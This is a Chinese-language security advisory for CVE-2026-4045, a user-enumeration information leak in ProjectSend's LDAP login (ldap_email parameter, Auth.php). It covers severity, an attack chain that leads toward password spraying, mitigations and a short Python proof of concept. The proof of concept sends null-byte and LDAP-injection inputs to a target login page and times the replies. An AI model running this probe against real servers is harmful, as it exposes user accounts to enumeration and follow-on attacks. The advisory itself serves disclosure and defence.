CVE-2026-4045: ProjectSend LDAP认证信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-4045

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ProjectSend

漏洞概述

CVE-2026-4045是ProjectSend软件中的一个信息泄露漏洞。该漏洞存在于ProjectSend的LDAP认证模块中，具体位于includes/Classes/Auth.php文件。攻击者可以通过操纵ldap_email参数触发可观察的响应差异（observable response discrepancy），从而获取系统敏感信息或推断有效用户账号。漏洞评分3.7（低危），CVSS向量为CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N。虽然攻击可远程执行且无需认证，但利用复杂度较高，需要攻击者具备一定的技术能力。该漏洞影响ProjectSend r1945及之前版本，漏洞已于2026年3月12日公开披露，厂商在收到通知后未做出任何回应。鉴于漏洞已公开且利用代码可能已发布，建议用户尽快采取防御措施。

技术细节

该漏洞属于LDAP认证模块中的信息泄露问题。攻击者通过向ldap_email参数注入特殊构造的输入，利用LDAP查询过程中的响应差异来获取系统信息。在正常的认证流程中，系统会根据ldap_email参数查询LDAP目录服务，当参数值存在细微差异时，系统会返回不同的响应时间或错误消息，攻击者可以利用这些差异推断有效用户的存在性。漏洞的技术根源在于Auth.php文件中的LDAP查询逻辑未对用户输入进行充分的验证和统一化处理，导致攻击者可以通过观察响应差异进行信息枚举攻击。这种攻击方式属于侧信道攻击（Side-Channel Attack）的一种变体，攻击者无需直接获取数据库内容，而是通过系统行为差异推断敏感信息。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的ProjectSend版本，确认版本号<=r1945

STEP 2

步骤2: 定位认证入口

访问ProjectSend的登录页面，定位LDAP认证模块的输入点

STEP 3

步骤3: 参数探测

向ldap_email参数发送不同的测试值，观察系统响应时间和错误消息差异

STEP 4

步骤4: 信息枚举

利用响应差异（observable response discrepancy）推断有效用户邮箱地址

STEP 5

步骤5: 后续攻击准备

收集到的用户邮箱信息可用于社会工程攻击、密码喷洒攻击或进一步认证绕过尝试

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import time # CVE-2026-4045 PoC - LDAP Email Information Disclosure # Target: ProjectSend <= r1945 # Location: includes/Classes/Auth.php TARGET_URL = "http://target.com/" def test_ldap_email_injection(): """ Test for LDAP email parameter manipulation leading to observable response discrepancy """ # Test different email formats to observe response differences test_emails = [ "[email protected]", "[email protected]", "[email protected]\x00", # Null byte injection "[email protected]", "'or'1'='[email protected]", # LDAP injection attempt ] for email in test_emails: start_time = time.time() # Simulate LDAP authentication request data = { 'ldap_email': email, 'ldap_password': 'test123' } try: response = requests.post( TARGET_URL + 'login.php', data=data, timeout=10 ) elapsed = time.time() - start_time print(f"Email: {email}") print(f"Status: {response.status_code}") print(f"Response Time: {elapsed:.4f}s") print(f"Response Length: {len(response.content)}") print("-" * 50) except requests.exceptions.RequestException as e: print(f"Error testing {email}: {e}") if __name__ == "__main__": test_ldap_email_injection()

影响范围

ProjectSend <= r1945

防御指南

临时缓解措施

临时缓解措施：1) 禁用LDAP认证功能，切换到本地认证模式；2) 限制LDAP服务器的访问范围，只允许受信任的IP访问；3) 启用Web应用防火墙（WAF）规则，检测和阻止异常的ldap_email参数输入；4) 监控认证日志，关注异常的响应时间模式和多次认证失败尝试；5) 如果可能，在LDAP查询层实现响应时间随机化，防止信息推断攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4045
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4045
3 Details https://www.cvedetails.com/cve/CVE-2026-4045/
4 VulDB https://vuldb.com/cve/CVE-2026-4045
5 Link https://drive.google.com/file/d/1TNwWNTcra2ykx0yXpATPmsPgJxIxOrWb/view?usp=sharing
6 Link https://vuldb.com/?ctiid.350657
7 Link https://vuldb.com/?id.350657
8 Link https://vuldb.com/?submit.769577